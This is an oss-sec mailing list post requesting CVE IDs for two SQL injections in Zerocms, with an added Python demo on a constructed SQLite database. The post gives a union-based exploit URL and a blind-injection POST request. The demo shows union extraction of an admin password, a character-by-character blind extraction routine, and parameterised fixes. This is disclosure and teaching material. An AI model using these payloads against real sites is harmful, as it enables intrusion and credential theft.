oss-sec mailing list archives
Re: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities
From: Steffen Rösemann <steffen.roesemann1986 () gmail com>
Date: Sun, 1 Feb 2015 15:49:16 +0100
I just got a reply from MITRE. I missed that the first SQL injection vulnerability had already been assigned CVE-2014-4034. Sorry, I missed that one.

Greetings.

Steffen

2015-02-01 9:15 GMT+01:00 Steffen Rösemann <steffen.roesemann1986 () gmail com>:

Hi Steve, Josh, vendors, list.

I found two SQL injection vulnerabilities in Zerocms <= v. 1.3.3.

The first SQL injection vulnerability is located in the article_id parameter used in zero_view_article.php and can be exploited even by unauthenticated attackers. See the following exploit example:

http://{TARGET}/views/zero_view_article.php?article_id=-1+union+select+database%28%29,2,version%28%29,user%28%29,5,6+--+

The second vulnerability is a blind SQL injection and is located in the user_id parameter used in a POST request to zero_transact_user.php. An attacker can exploit this vulnerability in the administrative backend via the following POST request exploit example:

POST /views/zero_transact_user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://{TARGET}/views/zero_user_account.php?user_id=2
Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

name=user&email=user%40user.de&access_level=1&user_id=2 {SQL injection goes here}&action=Modify+Account

Could you please assign a CVE-ID for this? Thank you very much.

Greetings from Germany.

Steffen Rösemann

References:
[1] http://aas9.in/zerocms/
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-13.html
[3] https://github.com/perezkarjee/zerocms/issues/3
[4] https://github.com/sroesemann/zerocms
[5] https://twitter.com/sroesemann/status/559273548691546113
[6] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-14.html
[7] http://seclists.org/fulldisclosure/2015/Feb/4
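The two injection classes in the report above (a union-based injection through article_id and a blind injection through user_id), reproduced as an added example that is not part of the mail or of Zerocms. The PHP source is not on the page, so the schema, the query shapes and the function names below are assumptions: the article lookup is taken to select six columns (the width the reported payload needs) and paste article_id into the SQL, the account update is taken to paste user_id the same way, and the blind oracle is taken to be whether the update matched a row. The target is an in-memory SQLite database with constructed rows, so sqlite_version() and a cross-table subquery stand in for the MySQL database(), version() and user() of the original payload. Each vulnerable function is paired with a bound-parameter version that refuses the same payloads.

```python
"""Union-based and boolean-blind SQL injection against a constructed SQLite stand-in."""
import sqlite3
import string


def make_db() -> sqlite3.Connection:
    """Constructed sample data; not the real Zerocms schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE articles(article_id INTEGER, title TEXT, body TEXT,
                              author TEXT, created TEXT, category TEXT);
        CREATE TABLE users(user_id INTEGER, name TEXT, email TEXT,
                           access_level INTEGER, password TEXT);
        INSERT INTO articles VALUES (1, 'Hello', 'Welcome', 'admin', '2015-01-01', 'news');
        INSERT INTO users VALUES (1, 'admin', 'admin@example.org', 9, 's3cret');
        INSERT INTO users VALUES (2, 'user', 'user@user.de', 1, 'hunter2');
        """
    )
    return conn


ARTICLE_SQL = ("SELECT article_id, title, body, author, created, category "
               "FROM articles WHERE article_id = ")


def view_article_vulnerable(conn, article_id: str):
    """Hypothetical stand-in for zero_view_article.php: the parameter is pasted into the SQL."""
    return conn.execute(ARTICLE_SQL + article_id).fetchall()


def view_article_fixed(conn, article_id: str):
    """Same lookup with a type check and a bound parameter; the payload never reaches the parser."""
    if not article_id.lstrip("-").isdigit():
        return []
    return conn.execute(ARTICLE_SQL + "?", (int(article_id),)).fetchall()


# SQLite rendition of the reported payload: a non-existent id, then a six-column UNION
# whose third and fourth columns carry attacker-chosen expressions.
UNION_PAYLOAD = ("-1 UNION SELECT 1, 2, sqlite_version(), "
                 "(SELECT password FROM users WHERE user_id = 1), 5, 6 -- ")

UPDATE_SQL = "UPDATE users SET name = ?, email = ?, access_level = ? WHERE user_id = "


def modify_account_vulnerable(conn, name, email, access_level, user_id: str) -> int:
    """Hypothetical stand-in for zero_transact_user.php; returns the number of rows updated."""
    cur = conn.execute(UPDATE_SQL + user_id, (name, email, access_level))
    conn.commit()
    return cur.rowcount


def modify_account_fixed(conn, name, email, access_level, user_id: str) -> int:
    """Bound user_id: a non-numeric value is rejected before any SQL runs."""
    if not user_id.isdigit():
        return 0
    cur = conn.execute(UPDATE_SQL + "?", (name, email, access_level, int(user_id)))
    conn.commit()
    return cur.rowcount


def blind_oracle(conn, condition: str) -> bool:
    """Boolean oracle (assumed observable): user 2 is updated only when the injected condition holds."""
    payload = f"2 AND ({condition})"
    return modify_account_vulnerable(conn, "user", "user@user.de", 1, payload) == 1


def blind_extract_admin_password(conn, max_len: int = 32) -> str:
    """Recover users.password for user_id 1 one character at a time through the oracle.
    Characters are compared by code point, so the payload never needs a quote."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in string.printable[:-5]:  # printable ASCII without the control-character tail
            cond = (f"(SELECT unicode(substr(password, {pos}, 1)) "
                    f"FROM users WHERE user_id = 1) = {ord(ch)}")
            if blind_oracle(conn, cond):
                recovered += ch
                break
        else:
            break  # no character matched: substr() returned '' and the string has ended
    return recovered


if __name__ == "__main__":
    db = make_db()
    print(view_article_vulnerable(db, UNION_PAYLOAD))   # one attacker-controlled row
    print(view_article_fixed(db, UNION_PAYLOAD))        # []
    print(blind_extract_admin_password(db))             # s3cret
    print(modify_account_fixed(db, "user", "user@user.de", 1, "2 AND 1=1"))  # 0
```

The union half shows why the reported payload carries exactly six values: every SELECT in a UNION must have the same column count, and any column that the page renders becomes an output channel. The blind half shows what "blind" means in the second finding: nothing from the database is displayed, so each request answers one yes/no question and the secret is rebuilt from a sequence of those answers. The fix in both cases is the same: decide the type of the parameter, reject anything else, and bind the value instead of concatenating it.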
Current thread:
- CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities Steffen Rösemann (Feb 01)
- Re: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities cve-assign (Feb 01)
- Re: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities Steffen Rösemann (Feb 01)